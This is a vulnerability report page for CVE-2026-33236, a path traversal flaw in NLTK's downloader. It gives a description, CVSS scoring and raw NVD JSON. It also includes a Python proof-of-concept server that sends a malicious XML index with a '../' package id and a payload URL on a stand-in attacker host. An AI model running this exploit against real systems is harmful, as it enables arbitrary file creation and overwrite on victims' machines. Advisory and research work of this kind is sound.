Security Vulnerability Report
中文
CVE-2026-33236 CVSS 8.1 HIGH

CVE-2026-33236

Published: 2026-03-20 23:16:47
Last Modified: 2026-03-23 19:15:38

Description

NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, the NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to arbitrary directory creation, arbitrary file creation, and arbitrary file overwrite. Commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a patches the issue.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nltk:nltk:*:*:*:*:*:*:*:* - VULNERABLE
NLTK <= 3.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Malicious XML Index Server Example (PoC Concept) # This XML structure demonstrates how to inject path traversal. import http.server import socketserver import xml.etree.ElementTree as ET PORT = 8000 # Malicious XML payload containing path traversal MALICIOUS_XML = """<?xml version="1.0" encoding="UTF-8"?> <nltk_data> <packages> <package id="../../../../tmp/malicious_payload.txt" subdir="corpora"> <url>http://attacker-server.com/payload.txt</url> <checksum type="sha256">dummy_checksum</checksum> </package> </packages> </nltk_data> """ class MaliciousHandler(http.server.BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header('Content-type', 'text/xml') self.end_headers() self.wfile.write(MALICIOUS_XML.encode('utf-8')) print("[+] Sent malicious XML index to victim.") with socketserver.TCPServer(("", PORT), MaliciousHandler) as httpd: print(f"[+] Malicious server running at port {PORT}") print("[+] Configure NLTK to use this server as an index and trigger download.") httpd.serve_forever() # Victim Side (Conceptual) # import nltk # nltk.set_proxy('http://127.0.0.1:8000/index.xml') # nltk.download('malicious_payload') # Triggers the traversal

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33236", "sourceIdentifier": "[email protected]", "published": "2026-03-20T23:16:47.007", "lastModified": "2026-03-23T19:15:37.720", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, the NLTK downloader does not validate the `subdir` and `id` attributes when processing remote XML index files. Attackers can control a remote XML index server to provide malicious values containing path traversal sequences (such as `../`), which can lead to arbitrary directory creation, arbitrary file creation, and arbitrary file overwrite. Commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a patches the issue."}, {"lang": "es", "value": "NLTK (Natural Language Toolkit) es un conjunto de módulos Python de código abierto, conjuntos de datos y tutoriales que apoyan la investigación y el desarrollo en Procesamiento del Lenguaje Natural. En las versiones 3.9.3 y anteriores, el descargador de NLTK no valida los atributos 'subdir' e 'id' al procesar archivos de índice XML remotos. Los atacantes pueden controlar un servidor de índice XML remoto para proporcionar valores maliciosos que contengan secuencias de salto de ruta (como '../'), lo que puede llevar a la creación arbitraria de directorios, creación arbitraria de archivos y sobrescritura arbitraria de archivos. El commit 89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nltk:nltk:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.9.3", "matchCriteriaId": "E3C35863-7D82-4EEF-BDE8-E94C559CF4FB"}]}]}], "references": [{"url": "https://github.com/nltk/nltk/commit/89fe2ec2c6bae6e2e7a46dad65cc34231976ed8a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/nltk/nltk/security/advisories/GHSA-469j-vmhf-r6v7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}